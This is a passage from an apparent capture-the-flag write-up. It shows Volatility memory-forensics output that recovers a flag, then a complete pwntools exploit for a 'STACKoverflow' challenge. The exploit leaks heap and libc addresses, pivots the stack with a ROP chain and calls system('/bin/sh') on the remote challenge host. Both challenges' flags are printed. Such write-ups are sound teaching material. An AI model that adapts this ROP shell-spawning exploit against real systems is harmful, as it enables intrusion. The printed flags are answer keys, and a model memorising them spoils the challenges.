0xffffe001dddef480 services.exe 732 628 6 0 0 0 2023-03-03 08:50:00 UTC+0000
0xffffe001dddfa080 lsass.exe 740 628 10 0 0 0 2023-03-03 08:50:00 UTC+0000
0xffffe001dde75080 svchost.exe 804 732 20 0 0 0 2023-03-03 08:50:01 UTC+0000
0xffffe001dde84840 svchost.exe 836 732 9 0 0 0 2023-03-03 08:50:02 UTC+0000
0xffffe001ddecc080 dwm.exe 932 672 8 0 1 0 2023-03-03 08:50:02 UTC+0000
0xffffe001ddf1b080 svchost.exe 508 732 71 0 0 0 2023-03-03 08:50:03 UTC+0000
0xffffe001ddf2b540 svchost.exe 8 732 22 0 0 0 2023-03-03 08:50:03 UTC+0000
0xffffe001ddf30840 svchost.exe 544 732 24 0 0 0 2023-03-03 08:50:03 UTC+0000
0xffffe001ddf45840 svchost.exe 728 732 31 0 0 0 2023-03-03 08:50:03 UTC+0000
0xffffe001ddf4d840 svchost.exe 792 732 16 0 0 0 2023-03-03 08:50:03 UTC+0000
0xffffe001ddfe6840 svchost.exe 1224 732 23 0 0 0 2023-03-03 08:50:04 UTC+0000
0xffffe001de0516c0 spoolsv.exe 1436 732 10 0 0 0 2023-03-03 08:50:04 UTC+0000
0xffffe001de0a8680 svchost.exe 1460 732 28 0 0 0 2023-03-03 08:50:05 UTC+0000
0xffffe001de1275c0 rundll32.exe 1624 508 1 0 0 0 2023-03-03 08:50:05 UTC+0000
0xffffe001de18a840 dasHost.exe 1812 792 9 0 0 0 2023-03-03 08:50:06 UTC+0000
0xffffe001de1d1080 svchost.exe 1844 732 11 0 0 0 2023-03-03 08:50:06 UTC+0000
0xffffe001de258540 svchost.exe 2020 732 6 0 0 0 2023-03-03 08:50:08 UTC+0000
0xffffe001de2d2340 vm3dservice.ex 1276 732 2 0 0 0 2023-03-03 08:50:08 UTC+0000
0xffffe001de304580 VGAuthService. 1792 732 2 0 0 0 2023-03-03 08:50:08 UTC+0000
0xffffe001de374480 vmtoolsd.exe 1948 732 13 0 0 0 2023-03-03 08:50:09 UTC+0000
0xffffe001de2e2080 vm3dservice.ex 2092 1276 2 0 1 0 2023-03-03 08:50:09 UTC+0000
0xffffe001de3a5840 MsMpEng.exe 2156 732 38 0 0 0 2023-03-03 08:50:09 UTC+0000
0xffffe001de492840 WmiPrvSE.exe 2340 804 9 0 0 0 2023-03-03 08:50:12 UTC+0000
0xffffe001de1e0640 sihost.exe 2348 508 11 0 1 0 2023-03-03 08:50:12 UTC+0000
0xffffe001de4c6840 taskhostw.exe 2372 508 13 0 1 0 2023-03-03 08:50:12 UTC+0000
0xffffe001de513840 dllhost.exe 2508 732 14 0 0 0 2023-03-03 08:50:13 UTC+0000
0xffffe001dd1d8600 CompatTelRunne 2856 1624 6 0 0 0 2023-03-03 08:50:19 UTC+0000
0xffffe001dc433080 msdtc.exe 2908 732 12 0 0 0 2023-03-03 08:50:22 UTC+0000
0xffffe001de6bf840 userinit.exe 832 672 0 -------- 1 0 2023-03-03 08:50:24 UTC+0000
0xffffe001de6df840 explorer.exe 1604 832 40 0 1 0 2023-03-03 08:50:24 UTC+0000
0xffffe001de240840 RuntimeBroker. 2644 804 15 0 1 0 2023-03-03 08:50:25 UTC+0000
0xffffe001de7b6840 NisSrv.exe 3156 732 8 0 0 0 2023-03-03 08:50:27 UTC+0000
0xffffe001de85a840 SearchIndexer. 3288 732 16 0 0 0 2023-03-03 08:50:28 UTC+0000
0xffffe001de8d7840 ShellExperienc 3504 804 19 0 1 0 2023-03-03 08:50:29 UTC+0000
0xffffe001de671840 SearchUI.exe 3624 804 23 0 1 0 2023-03-03 08:50:30 UTC+0000
0xffffe001dea59840 WmiPrvSE.exe 3728 804 10 0 0 0 2023-03-03 08:50:31 UTC+0000
0xffffe001de4af080 vmtoolsd.exe 4228 1604 8 0 1 0 2023-03-03 08:50:44 UTC+0000
0xffffe001de4c5080 OneDrive.exe 4384 1604 21 0 1 1 2023-03-03 08:50:47 UTC+0000
0xffffe001dec1a080 ApplicationFra 4660 804 7 0 1 0 2023-03-03 08:50:53 UTC+0000
0xffffe001ded6a840 MicrosoftEdge. 4756 804 33 0 1 0 2023-03-03 08:50:54 UTC+0000
0xffffe001dee4b840 browser_broker 4804 804 9 0 1 0 2023-03-03 08:50:55 UTC+0000
0xffffe001def1b840 MicrosoftEdgeC 4152 2644 27 0 1 0 2023-03-03 08:51:05 UTC+0000
0xffffe001ddf81080 svchost.exe 1448 732 3 0 1 0 2023-03-03 08:52:12 UTC+0000
0xffffe001de59b840 taskeng.exe 3808 508 4 0 1 0 2023-03-03 08:52:13 UTC+0000
0xffffe001dd9f5080 MicrosoftEdgeC 1016 2644 42 0 1 0 2023-03-03 08:52:17 UTC+0000
0xffffe001de7d3840 WmiApSrv.exe 1580 732 4 0 0 0 2023-03-03 08:53:33 UTC+0000
0xffffe001de4f2380 SearchProtocol 4280 3288 6 0 1 0 2023-03-03 08:54:54 UTC+0000
0xffffe001decf3080 taskhostw.exe 984 508 7 0 1 0 2023-03-03 08:55:14 UTC+0000
0xffffe001de003080 MicrosoftEdgeC 2460 2644 9 0 1 0 2023-03-03 08:55:40 UTC+0000
0xffffe001dec90840 MicrosoftEdgeC 5904 2644 23 0 1 0 2023-03-03 08:56:07 UTC+0000
0xffffe001de75e080 MicrosoftEdgeC 6056 2644 38 0 1 0 2023-03-03 08:56:21 UTC+0000
0xffffe001df58b080 SearchProtocol 3416 3288 7 0 0 0 2023-03-03 08:57:01 UTC+0000
0xffffe001dea1f840 SearchFilterHo 1584 3288 5 0 0 0 2023-03-03 08:57:01 UTC+0000
0xffffe001dd5ca080 MpCmdRun.exe 3996 4936 7 0 0 0 2023-03-03 08:57:02 UTC+0000
0xffffe001dd5ae080 WOW.exe 4024 4804 3 0 1 1 2023-03-03 08:57:14 UTC+0000
0xffffe001dd57d080 conhost.exe 5296 4024 3 0 1 0 2023-03-03 08:57:14 UTC+0000
0xffffe001dedbb840 audiodg.exe 4928 544 9 0 0 0 2023-03-03 08:57:14 UTC+0000
0xffffe001dd5f8840 cmd.exe 5224 1948 0 -------- 0 0 2023-03-03 08:57:18 UTC+0000
0xffffe001dd57f840 conhost.exe 3836 5224 0 -------- 0 0 2023-03-03 08:57:18 UTC+0000
python2 vol.py -f /home/kali/Downloads/ctf/incognito/wow/WOW.vmem --profile=Win10x64_10240_17770 procdump -D ./ -p 4024
strings *
result ->
m3m0ry_f0r3ns1c_1s_am4z1ng
guess ->
INCO{m3m0ry_f0r3ns1c_1s_am4z1ng}
11. STACKoverflow
rop chaining + stack pivoting
from pwn import *
#p = process('STACKoverflow')
p = remote('ctf.incognito.kr', 50001)
e = ELF('STACKoverflow')
libc = ELF('libc.so.6')
def Question(question):
p.sendlineafter(b'>', b'1')
if len(question) == 0x20:
p.sendafter(b'>', question)
else:
p.sendlineafter(b'>', question)
def Answer(num, answer, more):
p.sendlineafter(b'>', b'2')
p.sendlineafter(b'>', str(num))
if len(answer) == 0x20:
p.sendafter(b'>', answer)
else:
p.sendlineafter(b'>', answer)
if len(more) == 0x60:
p.sendafter(b'>', more)
else:
p.sendlineafter(b'>', more)
pop_rdi = 0x00000000004016e5
leave_ret = 0x401688
ret = 0x000000000040101a
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Answer(2, b'A' * 0x20, b'')
Question(b'A' * 0x20)
p.sendlineafter(b'>', b'2')
print(p.recvuntil(b'A' * 0x40))
heap_leak = u64(p.recvuntil(b'2.')[:-2].ljust(8, b'\x00'))
print(hex(heap_leak))
p.sendlineafter(b'>', b'2')
p.sendlineafter(b'>', b'2')
p.sendlineafter(b'>', b'')
#gdb.attach(p, 'b *0x401688\nb*0x40165B\n')
#pause()
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x18 + p64(heap_leak + 0x60 + 0x50*3*6+0x8))
Question(b'A' * 0x20)
Answer(6, p64(pop_rdi) + p64(e.got['puts']) + p64(e.plt['puts']) + p64(0x40165B), b'A' * 0x50 + p64(heap_leak - 0x30 - 0x8 + 0x50 + 0x50*3*6) + p64(leave_ret))
libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - libc.symbols['puts']
og = [0x50a37, 0xebcf1, 0xebcf5, 0xebcf8]
one_gadget = libc_base + og[0]
print(hex(one_gadget))
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
p.send(p64(ret) * (0x60//8-3) + p64(pop_rdi) + p64(binsh) + p64(system_addr))
p.interactive()
#INCO{"WH4T_A_N1C3_WE4THER_I5!"}
Comments